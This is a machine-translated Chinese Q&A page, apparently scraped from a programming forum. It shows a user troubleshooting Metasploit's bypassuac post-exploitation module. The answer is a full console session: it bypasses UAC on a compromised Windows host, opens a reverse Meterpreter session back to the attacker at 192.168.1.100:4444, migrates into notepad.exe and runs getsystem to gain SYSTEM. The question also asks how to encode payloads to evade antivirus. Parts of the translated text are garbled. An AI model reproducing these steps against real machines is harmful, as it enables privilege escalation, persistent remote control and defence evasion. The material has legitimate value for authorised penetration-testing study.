1. 首頁
  2. 問答
  3. 的Metasploit:bypassuac窗口權限提升掛起

的Metasploit:bypassuac窗口權限提升掛起

2012-02-09 80 views
1

後/窗/升級/ bypassuac似乎失敗對我來說的Metasploit:bypassuac窗口權限提升掛起

出於某種原因,我不能得到這個職位,開發模塊bypassuac工作。 這是我做過什麼:

  1. 打開目標機器上的Meterpreter就會會話(如在NetworkService用戶)
  2. 把會議背景

  3. 嘗試使用後開發模塊是這樣的:

    後期使用/窗/升級/ bypassuac 設置會話1個 集LHOST 192.168.1.100 集LPORT 4444利用

  4. 該端口尚未使用,所以應該沒問題。

  5. 輸出如下:

    [ - ]處理程序不能結合到192.168.1.100:4444 []開始反向處理程序上0.0.0.0:4444 []啓動有效負載處理程序。 .. []上載旁路UAC可執行到文件系統... [] Meterpreter就會驛站可執行73802個字節長正在上傳.. []上載的代理到文件系統.... []郵模塊執行完成

  6. 然後它返回到控制檯,什麼也不做,沒有新的會話,什麼也不做。

我查了以下幾件事:

  1. 手動上傳可執行bypassuac-x86.exe程序的目標。這工作得很好。
  2. 檢查virusscanner的警鈴是否未響應可執行文件。他們沒有

有沒有辦法手動運行可執行文件,並且有人可以向我解釋如何以SYSTEM級別訪問方式打開新的meterpreter會話?

或者我可以以某種方式編碼有效負載並使用我的自定義模板來規避所有防病毒可能性?我還沒有找到任何編碼後期開發模塊的選項。

在此先感謝

Halvar

來源

2012-02-09 68616c766172

回答

0 
msf exploit(handler) > use post/windows/escalate/bypassuac 
msf post(bypassuac) > show options 

Module options: 

Name Current Setting Required Description 
—- ————— ——– ———– 
RHOST no Host 
RPORT 4444 no Port 
SESSION yes The session to run this module on. 

msf post(bypassuac) > set SESSION 1 
SESSION => 1 
msf post(bypassuac) > exploit 

[*] Started reverse handler on 192.168.1.100:4444 
[*] Starting the payload handler… 
[*] Uploading the bypass UAC executable to the filesystem… 
[*] Meterpreter stager executable 73802 bytes long being uploaded.. 
[*] Uploaded the agent to the filesystem…. 
[*] Executing the agent with endpoint 192.168.1.100:4444 with UACBypass in effect… 
[*] Post module execution completed 
msf post(bypassuac) > 
[*] Sending stage (749056 bytes) to 192.168.1.100 
[*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.102:1565) at Thu Jan 06 12:41:13 -0500 2011 
[*] Session ID 2 (192.168.1.100:4444 -> 192.168.1.102:1565) processing InitialAutoRunScript ‘migrate -f’ 
[*] Current server process: zuWlXDpYlOMM.exe (2640) 
[*] Spawning a notepad.exe host process… 
[*] Migrating into process ID 3276 
[*] New server process: notepad.exe (3276) 

msf post(bypassuac) > sessions -i 2 
[*] Starting interaction with 2… 

meterpreter > getsystem 
…got system (via technique 1). 
meterpreter > sysinfo

來源

2014-01-15 04:26:31 user3196630

相關問題

 相關問題